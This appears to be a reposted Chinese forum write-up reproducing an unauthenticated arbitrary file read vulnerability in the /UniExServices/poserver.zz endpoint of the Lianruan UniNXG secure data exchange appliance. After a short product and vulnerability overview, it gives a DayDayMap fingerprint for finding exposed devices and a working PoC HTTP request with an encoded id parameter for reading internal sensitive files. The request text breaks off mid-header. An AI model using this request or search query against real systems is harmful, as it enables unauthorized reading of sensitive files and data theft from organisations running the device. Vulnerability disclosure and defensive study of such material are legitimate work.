联软安渡 UniNXG 安全数据互换系统 任意文件读取漏洞复现
0x01 产品简介联软安渡UniNXG安全数据互换系统,是联软科技自研的业内融合网闸、网盘和DLP的一体机产品,它同时支持多网互换,查杀毒、审计审批、敏感内容辨认等功能,是解决用户网络隔离、网间及网内数据传输、互换、共享/分享、存储的抱负安全设备,具有开创性意义。
UniNXG能很好保障多网隔离的安全效果,给内部传输操纵提供了更可靠的方式,同时对内部文件传输安全态势进行分析展示,有效阻断文件传输过程中泄密的风险。
0x02 漏洞概述
联软安渡 UniNXG 安全数据互换系统 /UniExServices/poserver.zz 接口任意文件读取漏洞,未经身份验证的攻击者可利用此漏洞构造加密的恶意哀求读取系统内部敏感文件,造成数据泄漏,导致系统处于极不安全的状态。
0x03 复现环境
DayDayMap:
web.icon="928831999d8de4c41d271319631ab01b" https://img-blog.csdnimg.cn/direct/02ab2f08ad534641b63f7ff9834a9065.png
0x04 漏洞复现
PoC
GET /UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI= HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chr
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]